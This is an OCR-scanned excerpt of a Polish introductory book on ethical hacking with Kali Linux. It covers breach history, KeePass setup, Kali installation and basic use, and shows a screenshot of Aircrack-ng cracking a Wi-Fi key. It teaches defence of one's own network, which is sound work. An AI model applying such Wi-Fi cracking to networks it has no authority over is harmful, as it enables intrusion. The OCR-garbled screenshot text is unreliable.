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Wprowadzenie 
w świat etycznego 
hackingu 


Hacking jest niebezpieczny i szkodliwy. Etyczny hacking to 

jego przeciwieństwo, skupia się na testowaniu zabezpieczeń 

i po znalezieniu słabych punktów w ochronie — na jej 
wzmacnianiu, tak aby zapewnić jak największe bezpieczeństwo 
dla użytkownika. W tej książce poznamy właśnie sposoby 


testowania naszych zabezpieczeń 


D zięki specjalistom z dziedziny bezpieczeń- 
stwa i etycznym hakerom nasze systemy 
i aplikacje są coraz bezpieczniejsze. Jednak 
ogólne testy przeprowadzane są tylko w du- 
żych firmach i nie dla wszystkich aplikacji. Nie 
możemy być więc pewni wszystkich progra- 
mów i aplikacji, z jakich korzystamy. Dodat- 
kowo istnieją luki w bezpieczeństwie sieci, 
które ktoś może wykorzystać, jeśli sami nie 
zadbamy o nasze bezpieczeństwo. Korzystając 
z porad w kolejnych rozdziałach tej książki, 


KALI LINUX 


Jest to dystrybucja Linuxa oparta na 
systemie Debian. Jej słównym przezna- 
czeniem jest testowanie zabezpieczeń, K 
wykonywanie testów penetracyjnych lub 


audytów bezpieczeństwa. Po urucho- 
mieniu będziemy od razu mieli dostęp 
do ponad 600 gotowych do użycia 
narzędzi. Jest to kompletny system, 
który nawet używany przez amatora 
pomoże w ochronie sieci domowej oraz 
urządzeń do niej podpiętych. 
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będziemy mogli sami we własnym zakresie 
przetestować bezpieczeństwo naszej sieci 
i wszystkich urządzeń, jakie są do niej pod- 
łączone. Będziemy więc wykonywać zadania 
etycznego hakera - szukać luk bezpieczeń- 
stwa i słabości, a następnie je usuwać w celu 
podniesienia bezpieczeństwa. Aby przepro- 
wadzić testy, wykorzystamy odpowiednio 
skonfigurowany system operacyjny Kali Li- 
nux, który ma już gotowe specjalne narzędzia 
umożliwiające proste wykonywanie testów. 
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Etyczny hacking w praktyce 


raktycznie każdy specjalista do spraw 

bezpieczeństwa IT może zostać okre- 
ślony mianem etycznego hakera. Jeśli 
chcemy powstrzymać cyberprzestępcę, 
którego celem jest zdobycie kontroli nad 
naszym komputerem lub włamanie się do 
naszej sieci bezprzewodowej, należy po- 
znać jego techniki działania, programy, 
których używa, i sposób, w jaki z nich 
korzysta. Dopiero po zrozumieniu jego 
metodologii działania będziemy w stanie 
przygotować odpowiednią linię obrony. 


Działanie etycznego hakera możemy po- 
równać do działania antyterrorysty - on 
też musi wiedzieć, jak zachowa się praw- 
dziwy terrorysta, żeby być w stanie od- 
powiednio zareagować lub powstrzymać 
atak. 

Oczywiście zanim ktoś zostanie specja- 
listą w jakiejś dziedzinie, musi postawić 
w niej pierwsze kroki - porady przedsta- 
wione w dalszej części książki pozwolą 
na poznanie podstaw etycznego hackingu 
i obronę naszej sieci oraz urządzeń. 


Co znajdziemy w kolejnych rozdziałach? 


siążka została zaplanowana jako po- 

radnik i pozwala opanować podstawy 
testów bezpieczeństwa. Najlepiej czytać ją 
kolejno, rozdział po rozdziale, gdyż kroki 
wykonywane w początkowych rozdziałach 
są konieczne do realizacji zadań z ostatnich 
rozdziałów. W każdym rozdziale dotyczącym 
testów bezpieczeństwa znajdziemy również 
dokładne informacje na temat tego, jak zabez- 
pieczyć się przed konkretnym typem ataku. 


W rozdziale drugim skupimy się na stworze- 
niu profesjonalnego środowiska testowego, 
które pozwoli na wykonywanie wszystkich 
opisanych w książce testów i sprawdzenie 
naszej sieci oraz komputerów. Dodatkowo 


KALI 
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wprowadzenie w świat etycznego hackingu 


w tym rozdziale znajdziemy wiele porad, 
które będą szczególnie przydatne dla osób, 
które dopiero zaczynają przygodę z syste- 
mem Linux i nie znają podstaw obsługi tego 
systemu. 


Trzeci rozdział jest już wprowadzeniem 
w pierwsze testy bezpieczeństwa, które do- 
tyczą sieci bezprzewodowych. Dowiemy się, 
jak skutecznie ochronić naszą sieć, z jakiego 
szyfrowania powinniśmy korzystać, jakich 
haseł nie możemy używać i wiele więcej. 
Jest to niezwykle ważne, aby zabezpieczyć 
własną sieć jak najlepiej, gdyż jest to furtka 
dla atakujących, po jej przekroczeniu mogą 
wykonywać bardziej skomplikowane i sku- 
teczniejsze ataki. 


Aircrack-ng 1.5.2 
[06:66:66] 128/7126712 keys tested (536.86 k/s) 


Time left: 3 hours, 41 minutes, 24 seconds 8.06% 


KEY FOUND! [ 12345678 ] 


master Key : E1 8E 79 86 B4 SF AF 6A 11 66 43 6E 61 DE 64 AE 


32 7D 14 C3 E6 GF 6E C8 CF 1D 66 64 63 12 51 78 


: 20 4D 55 98 17 AC 9E E4 DE E4 D7 72 97 BF D9 1A 
76 FF E4 CA 1B BF 39 F6 9A A8 95 16 BF 12 87 C1 
41 2A A8 C8 C3 38 ©F 44 E5 86 EG B8 AD 74 D6 GA 
29 B9 AE 6D 2B D8 FQ 5F 15 86 5F 47 1F 51 88 AA 


Transient Key 


EAPOL HMAC : $D AD AŚ BF 22 D6 AF A6 BA AB E2 7D E2 BE D9 F9 


ŻE -a 


W rozdziale czwartym skupimy się na tym, 
jak zabezpieczać pliki, archiwa, aplikacje, 
a także jak istotne jest utworzenie odpo- 
wiednio długiego i skomplikowanego hasła 
do systemu Windows. 


Tanga TSZWST TZ 


Are ternce Hd Correcinó 


192.168.43 
GBoreretsicyf(i2 100.02) 
bocanost 


Bur asz.1e8431%) 


rzystając z przeglądarki, jakie pakiety moż- 
na przechwycić i czy da się wykryć intruza 
w naszej sieci. 


Rozdział szósty pomoże zrozumieć, na czym 
polega anonimowość i prywatność w interne- 
cie oraz jak ważne jest bezpieczne przeglądanie 
internetu. Jeśli będziemy anonimowi - cyber- 
przestępcy nie będą mogli namierzyć naszego 
komputera po anonimowym adresie IP i nie 


będą zagrażać naszej prywatności. 


Rozdział siódmy jest zdecydowanie bardziej 
skomplikowany, gdyż dotyczy zagrożeń, któ- 
re mogą spowodować przejęcie kontroli nad 
wybranym urządzeniem. Dowiemy się z nie- 
go, jak możemy we własnym zakresie prze- 
testować ochronę urządzeń w naszej sieci. 
Zobaczymy, jak sprawdzić, czy intruz w na- 
szej sieci mógłby szybko przejąć kontrolę. 
Przy każdym typie testu poznamy skuteczne 


Rozdział piąty wprowadzi nas w świat testów 
bezpieczeństwa sieci domowej i tego, co 
może nam grozić, gdy atakujący znajdzie się 
w niej lub gdy będziemy korzystać z otwar- 
tych punktów dostępowych. Dowiemy się 
też, w jaki sposób podsłuchiwany jest ruch 
w sieci lokalnej, na co zwrócić uwagę, ko- 
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Czego będziemy potrzebować 
do wykonania testów? 


rzedstawione w książce testy będziemy 

mogli bez problemów wykonać w domu. 
Wystarczy nam do tego komputer oraz do- 
stęp do internetu. 
Dodatkowo, jeśli będziemy chcieli wykonać 
wszystkie wskazówki z rozdziału o sieciach 
bezprzewodowych, będziemy musieli zaku- 
pić specjalną bezprzewodową kartę sieciową 
kompatybilną z narzędziami w systemie Kali 
Linux. 


Jeśli jednak nie 
będziemy mieć 
takiej karty, nadal 
będziemy mogli 
w pełni zabezpieczyć 

swoją sieć domową, 
nie będziemy mogli je- 
dynie w praktyce przete- 

stować jej bezpieczeństwa. 


Największe ataki cybernetyczne 
i wycieki danych ostatnich lat 


W 2010 roku wirus nazwany Stuxnet zain- 
fekował praktycznie wszystkie komputery 
na całym świecie, nie wykonywał jednak 
żadnych szkodliwych działań na zwykłych 
komputerach. Jego głównym celem było za- 
atakowanie wirówek w Iranie, które służyły 
do wzbogacania uranu i były częścią irań- 
skiego programu tworzenia broni nuklear- 
nej. W momencie gdy Stuxnet trafiał do kom- 
puterów sterujących wirówkami, zmieniał 
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wprowadzenie w świat etycznego hackingu 


ich ustawienia i doprowadzał do całkowite- 
go zniszczenia. Jest to jeden z pierwszych 
potwierdzonych ataków cybernetycznych. 


yahoo/ 


Yahoo! 

Największy wyciek danych miał miejsce 
w 2013 roku. Dopiero w 2017 roku fir- 
ma udostępniła pełne dane na ten temat: 
wyciekły dane ponad 3 miliardów użytkow- 
ników, dane kont każdego indywidualnego 
klienta, wliczając w to użytkowników serwi- 
sów Tumblr oraz Flickr. Firma nie podniosła 
się po tym ataku i została wkrótce sprzeda- 
na, a kary finansowe są płacone do dzisiaj. 


Facebook 

W kwietniu 2019 roku ba- 

dacze odkryli, że ogromna 

ilość danych użytkowników 

serwisu Facebook była pu- 

blicznie dostępna na ser- 

werach obliczeniowych w usłudze Amazon 
Cloud. Za taki stan odpowiedzialni byli dewe- 
loperzy dwóch aplikacji sieciowych. Jest to 
kolejny wyciek danych z serwisu Facebook. 
Amerykańska komisja handlowa nałożyła na 
firmę karę aż 5 miliardów dolarów za niepo- 
prawne przechowywanie danych klientów 
i zbieranie wrażliwych informacji bez wiedzy 
użytkowników. 


Morele.net 
W 2018 roku doszło do jednego z najwięk- 
szych w Polsce wycieków danych. Do sieci 


trafiły dane kont, w tym na- 

zwiska, numery telefonów, ER 
adresy e-mail. UODO 
(Urząd Ochrony Danych 
Osobowych) bardzo suro- 
wo ukarał serwis Morele. 
net, nakładając rekordową 
jak na Polskę karę 3 milionów złotych. Atak 
dotyczył danych około 2,2 miliona klientów. 


Virgin Mobile 

Polska 

W grudniu 2019 roku zo- 

stała zaatakowana przez 

hakerów jedna z aplikacji 

firmy Virgin Mobile Polska. 
Atak doprowadził do wycieku 
danych około 12,5 procent klientów prepaid 
(telefony „na kartę”). Wszyscy zaatakowani 
klienci zostali powiadomieni o incydencie. 
Nie podano jeszcze informacji o karze za nie- 
odpowiednie zabezpieczenie danych. 


„ O Dyn 


Atak DDoS (polega na zablokowaniu dostępu 
do danego serwisu, patrz więcej strona 49) 
został uruchomiony na ogromną skalę 
w październiku 2016 roku. Jego ofiarą pad- 
ła firma Dyn, która jest głównym dostawcą 
usług DNS dla popularnych stron inter- 
netowych. W wyniku ataku klienci mieli 
problem z dostępem do ponad 80 dużych 
witryn, jak Netflix, Amazon, Twitter, Pay- 
Pal. Straty zostały wycenione na ponad 110 
milionów dolarów. 


mobile 


CO JEŚLI TO MY PADNIEMY OFIARĄ WYCIEKU DANYCH? 


Jeśli atak dotyczy naszych danych osobowych, niestety, nie będziemy mogli zbyt wiele 
zrobić — nasze dane trafią do sieci. Jeżeli wyciek będzie dotyczył kart kredytowych, 


należy natychmiast je zablokować i wystąpić o nowe. W przypadku wycieku haseł — ko- 
niecznie musimy zmienić hasła na nowe. Uwaga! Jeśli tego samego hasła używaliśmy 
w zaatakowanym serwisie i na innych kontach, musimy zmienić hasło w każdym 
miejscu, w którym wykorzystywane było hasło ujawnione w wyniku wycieku danych. 
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Tym symbolem oznaczono w książce porady pokazujące, 
jak bronić się przed opisanymi wcześniej atakami. 


4 a 
(ę e Generator haseł 
R=ść 
komplikowane hasło o odpowiedniej 
długości to najlepsza ochrona naszych 
kont, sieci, systemów. Zgodnie z zasadami 
bezpieczeństwa do każdego konta powinni- 
śmy mieć inne hasło, ponieważ jeśli w wyni- 
ku wycieku danych zostanie ono ujawnione, 
nasze pozostałe konta nadal będą bezpieczne. 
Bezpieczne hasło powinno składać się z oko- 
ło 16 znaków, zawierać małe i duże litery, 
cyfry oraz znaki specjalne. Wymyślanie ta- 
kich haseł samemu może być czasochłonne 
i trudne. Dodatkowo zapewne mało kto 
będzie w stanie zapamiętać dziesiątki tego 
typu haseł do różnych kont, dlatego też warto 
korzystać z bezpiecznego menedżera i gene- 
ratora haseł KeePass (MIC). 


KeePass 

Najpopularniejszy bezpłatny program do 
bezpiecznego przechowywania haseł, nu- 
merów PIN i innych poufnych informacji 
w komputerze. Dane przechowywane 
w KeePass są silnie szyfrowane - dostęp 
do nich możliwy jest wyłącznie po poda- 
niu ustalonego przez nas hasła głównego 
lub/i opcjonalnego pliku-klucza. Program 
może również działać w trybie przenośnym, 
bez potrzeby instalacji w systemie, dzięki 
czemu można go przechowywać na przy- 
kład na pendrivie. 


Zakładamy bazę haseł 
Po uruchomieniu programu klikamy na 
Plik, Nowy i na Ok. 


Zapisujemy bazę danych w wybranej 
lokalizacji na dysku, klikając na Zapisz. 


$) Stwórz zbiorczy klucz główny x 


/ Stwórz zbiorczy klucz główny 


GAUserstkrzys DocumenisłBaza danych .kdbx 


Określ zbiorczy klucz główny, który bedzie użyty do szyfrowania bazy danych 


Zbierczy klucz główny sklada się z jedego hub więcej poniższych składników. Wszystkie zaznaczone tu 
wymagane da otwaresa bazy danych Jeśk atracaz któryś 26 składników. nie będze 


[0] Pokaż cpcje zawansowane: 


(©) Utwórz nowa baze danych - Krok 3 


"= — Ustawienia Bazy Danych 


z CAUeerelkrzyelDocumentelBaza danych kdbx 


Ogólne Bezpieczeństwo Kompregja Kosz Zaawansowane 


Nazwa bazy danych. [Testowa 


Opis bazy danych: 


Moje hasła 


Domyślna nazwa użytkownika w nowych wpisach |Krzysiek 


Pomoc OK Anuluj 


FA Kolor bazy danych: 


Tworzymy hasło główne do całej bazy 
danych i klikamy na OK 


Następnie konfigurujemy wstępnie naszą 

bazę haseł © i klikamy na OK. Pomijamy 
informacje o wydruku hasła i rozpoczynamy 
korzystanie z bazy. 


Nowe wpisy dodajemy, klikając na Dodaj 
wpis na górnym pasku. 


Generator haseł 
KeePass ma wbudowany specjalny gene- 
rator, który pozwoli na tworzenie bardzo 
silnych haseł. 


Klikamy na górnym pasku na Narzędzia, 
Generuj hasło. 


Podajemy długość hasła oraz z czego ma 


się składać „da 
Ustawienia Zaawansowane Podgląd 


Profi: (Użytkownika) * 4 [x 
Bieżące ustowóenia 
© Genenj używając zestawu znaków* 


Olugość hasła: UO 
EQ Weke key (A. B,C. ..) D Specja () 

(2 Mate tory a. bc, ) (2 Specjalne U. 5.2.8. ) 
Motyw 12 ) D Naway 1]. .).0). <>) 

LI Mnus () |; DD tatn'1 Rozszerzenie (A. u. 4. ..) 
[L] Podkredlenie () 


Dołącz również te znaki; 


Teraz wystarczy przejść 
do zakładki Podgląd, 
gdzie będziemy mogli 


Ustawienia Zaawansowane | Podgląd | 


Oo kika przykładowych haseł, spelriących 


podejrzeć przykładowo 
wygenerowane hasła 0—© 
Wystarczy jedno z nich ||: 
przekopiować i zapisać. 
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Środowisko testowe 
- Kali Linux 


Zanim zaczniemy testować zabezpieczenia naszej sieci, 
urządzeń do niej podłączonych, archiwów oraz różnego rodzaju 
usług, musimy przygotować sobie specjalne środowisko 
testowe. Najlepiej wykorzystać w tym celu sprawdzony system 


Kali Linux 


łasne środowisko testowe pozwala na 

wykonywanie różnego rodzaju testów 
zabezpieczeń w hermetycznym układzie, 
którego jesteśmy administratorami. Możemy 
dowolnie zarządzać poszczególnymi elemen- 
tami tego układu. Ta sama zasada dotyczy te- 
stów sieci bezprzewodowych - jeśli jesteśmy 
ich administratorami, możemy sprawdzać, jak 
mocne są ich zabezpieczenia. Wszystkie te 
działania ułatwi nam Kali Linux - specjalny 
system operacyjny przeznaczony dla testerów 
bezpieczeństwa. Znajdziemy w nim mnóstwo 


gotowych narzędzi, których nie musimy już 
instalować. Wystarczy poznać zasady ich 
działania, wykonać wstępną konfigurację 
i już można wypróbowywać różne scena- 
riusze. Dodatkowo wewnątrz systemu Kali 
Linux możemy uruchomić kilka maszyn wir- 
tualnych, na przykład z systemem Windows, 
i sprawdzać, czy trudno się do niego włamać. 
Tego typu testy są szczególnie istotne, gdy 
w Windows uruchamiamy usługi serwerowe, 
które poprzez specjalne porty komunikują się 
z internetem. 


03:32PM O a0/a- 
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Przygotowujemy środowisko 


a płycie dołączonej do książki znajdzie- 

my bootowalną wersję Live systemu 
Kali Linux. Taka wersja pozwala sprawdzić 
system i jego niektóre funkcje. Jednak ma 
duże ograniczenia - wprowadzane zmiany 
nie są zapisywane i tracimy je po wyłączeniu 
komputera, a część aplikacji w ogóle nie dzia- 
ła. Możemy utworzyć bootowalny pendrive 
z Kali Linuxem z partycją stałą (patrz kolejna 
strona). Zdecydowaną większość instrukcji 
z tej książki wykonamy, korzystając z Kali 
Linuxa Live z partycją stałą, ale by mieć pew- 
ność, że zadziałają wszystkie, trzeba przepro- 
wadzić pełną instalację Kali na dysku. 
Uwaga! Nie instalujemy Kali Linuxa na tym 
samym dysku, na którym mamy zainstalowa- 
ny system Windows, gdyż może to dopro- 
wadzić do całkowitego usunięcia Windows 
i nieodwracalnych zmian. Najlepiej zainstalo- 
wać Kali Linuxa na osobnym nośniku. 
Jeśli nie mamy możliwości skorzystania z płyty 
dołączonej do książki ze względu na brak na- 
pędu optycznego, należy pobrać z KS+ (www. 
ksplus.pl) obraz płyty oraz program Rufus. 
Będziemy mogli wtedy utworzyć na pendrivie 
bootowalny nośnik z Kali Linuxem w wersji 
Live, który można też zainstalować na dysku. 


4 Rufus 3,8.1580 x 


Właściwości dysku 
Urządzenie 

ESD 190 (F:) [16 GB] 

Wybór bootowania 

kali hinux 20194 amdóduso Q WYBIERZ 
Rozmiar trwałej partycji 
i] ł 0 (Brak trwałość 
Schemat partycjonowania Docelowy system 

MBR * BIOS lub UEF 


Y. Pokaż zaawansowane właściwości dysku 


Opcje formatowania 
Nazwa woluminu 
Kali Live 


System plików 
FAT32 (Domyślne) ży 


Rozmiar jednostki alokacji 
8192 bajtów (Domyślne) 
Y. Pokaż zaawansowane opcje formatowania 


Stan 


Gotowy 


60:88 4 za 


Tworzymy bootowalny nośnik USB 
z Kali Linuxem 

Uwaga! W trakcie tworzenia bootowalnego 
nośnika wszystkie wcześniej zapisane na nim 
dane zostaną usunięte. 


Pobieramy, instalujemy i uruchamiamy 
program Rufus. 


© Rufus 38.1580 x 


Właściwości dysku 


Urządzenie 
[ESD-150 (F:) [16 GB] „| 
Wybór bootowania ud 3 

Dysk lub obraz ISO (Proszę- © WYBIERZ 
Schemat partycjonowania Docelowy system 

GPT UEFI (bez CSM) 


w. Pokaż zaswansowane właściwości dysku 


Opcje formatowania 


Nazwa woluminu 


System plików Rozmiar jednostki alokacji 


FAT32 (Domyślne 8192 bajtów (Domyślne) 
W Pokaż zaawansowane opcje formatowania 


Stan 


CJ TART ZAMKNU 


Podłączamy nośnik USB do komputera 
i wybieramy go z listy Urządzenie 


Teraz w polu Wybór bootowania klikamy 
na Wybierz i wskazujemy obraz ISO Kali 
Linuxa © z naszego dysku. 


Na koniec klikamy na Start i potwier- 
dzamy informacje w kolejnych oknach, 
klikając na Tak i OK 


Viykryta obraz SOHybnd 
Obraz który wybrałeś to obraz ISOHybrid", To znacza iż może zostać zapitany w trybie 

(2) Obraz ISO (kopia plików) lub trybie Obraz OD (obraz dysku) 

Rufus zaleca użycie trybu Obraz ISO abyś zawsze mmuał pełny dostęp do dysku po jego 

zapisaniu 

Jednak ześh napotkasz problemy podcza: bootowania możesz spróbować zaprsać ten 

ohraz ponownie w trybie Obraz OD. 


Proszę wybrać tryb którego chcesz użyć do zapisania tego obrazu: 


© Zapisz w trybie Obraz ISO (zalecane) 


O Zapisz w trybie Obraz DD 
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środowisko testowe — Kali Linux 


PARTYCJA TRWAŁA A SYSTEM KALI LINUX 


W najnowszej wersji Kali Linuxa wprowa- 
dzono obsługę tak zwanej partycji stałej. 
Dzięki niej możemy wygodniej korzystać 
z systemu bez instalacji, w wersji Live 
- pozwala ona na zapisywanie danych. 


Wystarczy podczas tworzenia nośnika 
bootowalnego w oknie Rufusa w sekcji 
wybrać rozmiar 
partycji inny niż O, a po jego utworzeniu 
i uruchomieniu Kali Linuxa będziemy 
mieć do niej dostęp. Najważniejsze jest to, 
że dane na niej zapisane nie będą usuwane 


Wybór bootowania 
kal-hnia-2019.4-amdó450 


Rozmiar trwałej partycji 


pomiędzy kolejnymi uruchomieniami 
systemu. Nośnik musi mieć przynajmniej 
16 GB pojemności. Jest to dobre rozwią- 
zanie pośrednie, które pozwoli wykonać 
wiele z opisanych w tej książce porad bez 
konieczności instalacji całego systemu na 
osobnym dysku. 


Następnie możemy za pomocą naszego 
nośnika uruchomić system Kali Linux 
w wersji Live. 


Instalujemy system Kali Linux 
Po podłączeniu do komputera utworzone- 
go nośnika bootowalnego z Kali Linuxem 
lub umieszczeniu płyty DVD w napędzie te- 
startujemy komputer i przechodzimy do usta- 
wień Boot Menu, wciskając klawisz [dettej, fu), 
(e) lub [ee]. Wskazujemy nasz nośnik ©. 


Other boc 
f Fl 


Na ekranie startowym Kali Linuxa, ko- 
rzystając z klawiszy strzałek, wybieramy 
ię Graphical install 


i pi wierdzamy wy- 


(let kali uryzprst) 


(check kali org/prst) 


Po uruchomieniu instalatora w pierw- 
szym oknie wybieramy język polski 
i klikamy na Continue. 


Sabat a languago 


Choose hi 


Lange 1a Ma wę gar Eno Mala placza 1h> seloctod Lanquago wia sżc0 be tha 
ZE gag tar une otofied 


Postuguwse (Brasil + 


PurjabiiGormukką + me 
Romanian 5 


Sareonakst Ge ach Conlinue 


Następnie w podobny sposób wybieramy 
lokalizację oraz klawiaturę. 


Gdy dojdziemy do konfiguracji sieci, 
musimy podać nazwę hosta ©. Jest to 
nazwa, po której nasz system będzie roz- 
poznawany w sieci. Wszystkie wskazówki 
w książce będą odnosiły się do hosta nazwa- 
nego kali, jeśli więc nadamy inną nazwę ho- 


Konfiguruj sieć 


Wprowadź nazwę hosta dla Lego systemu. 


Nazwa hosta jest pojedynczym słowem, które Identyfikuje Twój system w sieci. 
powinna być nazwa hosta, skontaktuj się z administratorem Twojej sieci. jeśli 
domową, możesz spokojnie wpisać tu wymyśloną nazwę. 

Nazwa hosta: 
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sta, będziemy musieli o tym sami pamiętać. 
W oknie Nazwa domeny nie musimy nic 
wpisywać, wystarczy przejść Dalej. 


Następnie musimy ustalić hasło admini- 

stratora ©, które w Linuxie jest wymaga- 
ne zawsze przy wykonywaniu ważnych dla 
systemu modyfikacji, takich jak aktualizowa- 
nie lub instalowanie pakietów. 


KALI 


Musisz ustale hasło dla koeta root - sdniniatratora systemu, Złośiwy lub niewykwalłkiowany 
ubytkownik z uprawsżerismi adrżeśsttalcea może dokonać strasznych <zkód, więc powinioweć postarać 
By Rako było trudne oo te nie powinao być słowem ze słownika lob słowem, które 


Ustaw użytkownśków I hasta 


się 
łatwe £ Tobą skojaszy: 
Dobra hasła powinno zaniarać ary, syty I znaki przestankowe i powinno być zmieniane w reguiarnych 
Użytkownik tet nie powinien mięć pustego hasta. jeśli zostawisz je puste konto roota zostanie 
zablokowane, 4 konto użytkownika załeżowe podczas isstalacji otrzyma możkwość załogewania się na 
roota 7a pomecą polecenia "uudo* 


Zmióć uwagę, że hasło nie będzie widoczne peckzas wpisywania. 
PONI 


22.200000 
Pokaż hasto 


Proszę wpisać to sano hasło ponownie, aby upewnk się, że zostało wpisane poprawrie. 
Potwmocić Piko 


224000000 
Pokaż hasło 


Zrzuń ekranu wstecz Dalej 


Po przejściu Dalej uruchomiony zostanie 
kreator partycjonowania; osoby począt- 
kujące powinny wybrać opcję Przewodnik 
- cały dysk 


Partycjonuj dyski 


Po wybraniu partycjonowania całego dysku z przewodnikiem pl 
Sposób partycjonowania: 


Przewodnik - cały dysk 
Przewodnik - cały dysk i ustawienie LVM 

Przewodnik - cały dysk i ustawienie szyfrowanego LVM 
Ręcznie 


Następnie wybieramy dysk, na którym 

chcemy zainstalować Kali Linuxa © - 
pamiętajmy, aby nie wskazać dysku, na 
którym zainstalowany mamy już system 
Windows. Uwaga! Wszystkie dane z wybra- 
nego dysku zostaną usunięte. 


Partycjonuj dyski 


Zauważ, że wszystkie dane na wybranym dysku zostaną usunięte, al 
naprawdę chcesz zastosowania zmian. 


Wybierz dysk do partycjonowania: 


SCSI3 (0,0,0) (sda) - 42.9 GB ATA VBOX HARDDISK 


W kolejnym oknie wybieramy opcję 
Wszystko na jednej partycji © i klikamy 
na Dalej. 


Partycjonuj dyski 


Wybrane do partycjonowania: 

ŚCSI3 (0,0,0) (sda) - ATA VBOX HARDDISK: 42.9 GB 
jesteś pewien. 

Metoda partycjonowania: 


Wszystko na jednej partycji (zalecane dla nowych użytkowników) 


oddzielna partycja home 


Napęd może zostać spartycjonowany na jeden z wielu różnych schematów. W 


Oddzielne partycje fhome, /var i imp 

1 Następnie pozostaje nam wybranie 
opcji Zakończ partycjonowanie i za- 

pisz zmiany na dysku ©. Klikamy na Dalej. 


Partycjonuj dyski 


To jest podgląd aktualne storńgurowanych partycy / punktów mortowana. Wyberz partycę by znodyfkowić 
ustawerua (system płków. punkt montowana td). worą przestrzeń ty dodać nową partycę Lb uzężcarie by” 
sara yeóżować jego tabicę partycz 

Partycjonowanie z przewodnikiem 

Korfigatuj programowy RAD 

Korfigoruj menedżera wełuninów logiczwych 

Korfigorui szyfrowane woluminy 

Korffigporuj wobuminy 14C5i 


7 4051340,0.04 (sda) - 42.9 GB ATA VOX KARDCTSK 
> ml główna 3760 1 eta 1 
> m5 logkzna 43GR  f przestrzeńwymiany przestrzeń wymiany 


Cofnij hc zoeż 
11 Potwierdzamy wprowadzenie zmian 
na dyskach i po chwili rozpocznie się 
instalacja. Jeśli mamy dostęp do sieci, zostaną 
pobrane dodatkowe sterowniki 


Konliguracja menedżera pakietów 


A network mirror can be used to supplement the software that is in| 
may also make newer versions of software available. 


Use a network mirror” 
- Nie 


1 


Po zainstalowaniu Kali Linuxa musi- 
my potwierdzić jeszcze kilka dodat 


kowych opcji i komputer zostanie ponownie 
uruchomiony, a przy kolejnym włączeniu zo- 
stanie załadowany nowy system 
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środowisko testowe — Kali Linux 


Pierwsze kroki w Kali Linuxie 


|-M zainstalowaniu systemu, zanim za- 
czniemy z niego w pełni korzystać, musi- 
my przygotować sobie odpowiednie warunki 
i przyszykować środowisko testowe. Warto 
zacząć od podstaw - poznania Kali Linuxa 
i jego obsługi. 

Gdy rozpoczniemy rozruch systemu Kali 
Linux, pojawi się specjalne okno startowe. 
Wybieramy na nim pierwszą BPE Kali 
GNU/| sali i wciskamy ([ 


Następnie musimy zalogować się do systemu, 
wprowadzając nazwę użytkownika - root, 
a hasło takie, jakie podaliśmy przy instalacji. 
Klikamy na Zaloguj ©. W wersji Live dane 
głównego użytkownika to login - root, a ha- 
sło toor. 


Anuluj 


Standardowe sterowniki dostępne w syste- 
mie pozwalają na bezproblemowy rozruch 
i wyświetlanie interfejsu graficznego systemu 
w wysokiej rozdzielczości. 

Najnowsza wersja systemu Kali Linux 2019.4 
różni się znacznie wizualnie od poprzednich 
edycji. Nie mamy w niej specjalnego paska 
doku na lewej krawędzi ekranu. Interfejs 
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został znacznie uproszczony, dzięki czemu 
początkujący użytkownicy będą mogli szyb- 
ciej przyzwyczaić się do nowego środowiska. 


Menu startowe i panel szybkiego 
dostępu 

Na górnym pasku zadań znajdziemy właściwie 
wszystkie najważniejsze elementy. Zaczynając 
: przycisk z logo s stemu 4 uru- 


[-_JEmutater terminala 
SĘ Verecżer plików 
| a Edytor tekstu 
(2) Przeglądarka internetowa 
DU kali Linux 
< Kali Docs 
Kali Bugs 
Offensive Security Training 
«- Exploit Database 


ŚŚ VuinHub 


Sniffing £ Spoof 


O - Post Exploitatio 


eering Tools 


na wiele kategorii z różnego rodzaju narzędzia- 
mi - omówimy je w kolejnych rozdziałach. 

Następnie po prawej od przycisku menu 
startowego znajduje się panel szybkiego 
dostępu ©. Możemy sami dodawać do niego 
i usuwać z niego elementy. Domyślnie znajdują 
się na nim cztery pozycje - minimalizowanie 
wszystkich okien, skrót do różnych lokalizacji 
na dysku, Terminal oraz Kazam (narzędzie do 
nagrywania i wykonywania zrzutów ekranu). 
Za tym panelem znajdują się skróty do prze- 
łączania obszarów roboczych - domyślnie są 
aktywne dwa takie obszary. 


adam1l3zajac(gmail.com 


Otwieramy menu startowe i przechodzimy 
do programu, który chcemy dodać. Klikamy 
na niego prawym przyciskiem myszy i wybie- 
ramy opcję Dodaj do panelu 


Firefox FSR 


OD «rs Phisher 


p A Dodaj do ulubionych 
minicom 


Dodaj do pulpitu 
ó dw eshark y 
< Ls! Dodaj do panelu 


Ż vy 
*, XHydra Edytuj program... 


Następnie możemy prze- 
mieścić aktywator, kli- 
kając na niego prawym 


przyciskiem myszy i wy- 
bierając Przemieść 


Przemie' 
TJ 


Panel 


Po prawej stronie paska zadań 
zegar z kalendarzem, ustawienia połączenia 
sieciowego, ustawienia głośności, powiado- 
mienia, ustawienia zasilania, przycisk bloko- 


04:09PM Q a0G6|a 6 


wania ekranu oraz przycisk kończenia sesji. 
Sesję w systemie Kali Linux możemy zakoń- 
czyć na bardzo wiele sposobów 


Kończenie sesji użytkownika root 


Domyślnie godzina na zegarze 
systemowym jest wyświetlana 
w formacie amerykańskim, ale 
można łatwo to zmienić. Kli- 
kamy prawym przyciskiem 
myszy na zegar i wybieramy 
Właściwości 


04:11PM O 


Usuń 


Panel 


pon 16 gru, 16:24 Q a ę 


Zegar Zu x 


= Zegar 


Ustawienia czasu 


Strefa czasowa: 


Wygląd 
Układ: 


Cyfrowy 


Format podpowiedzi poniedziałek 16 grudnia 2019 v 


Wskazania 
Format: |pon16 gru, 16:21 

16:21:45 

04:71 PM 


Własny 


© Pomoc 


x Zamknij 
Następnie w polu Format wybieramy spo- 
sob wyświetlania godziny 6. Zmiany zostaną 
wprowadzone natychmiast. Możemy rów- 
nież dostosować format według własnych 
upodobań, korzystając z trybu Własny. 


Dla bezpieczeństwa warto stworzyć nowego 
użytkownika, z którego konta będziemy cały 
czas korzystać, by tylko w wyjątkowych sy- 
tuacjach używać konta root. 


Na górnym pasku systemu Kali Linux 
klikamy na Terminal 


EE_EE EJ 


_ Wprowadza i wykonuje wiersze poleceń 


FJ Emulator terminala | 
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środowisko testowe — Kali Linux 


Wpisujemy polece- HF 

nie adduser na- R 
zwa_uzytkownika 
(na przykład adduser 
krzysiek) i zatwierdza- 
my. 


Działania Edycja 


root©kali: * 


raatQQkali: = 
Widok Pomoc 


:-ff adduser krzysiek 
Dodawanie użytkownika "krzysiek" ... 
Dodawanie nowej grupy "krzysiek" (1000) ... 
Dodawanie nowego użytkownika "krzysiek" (1000) w grupie "krzysiek" ... 
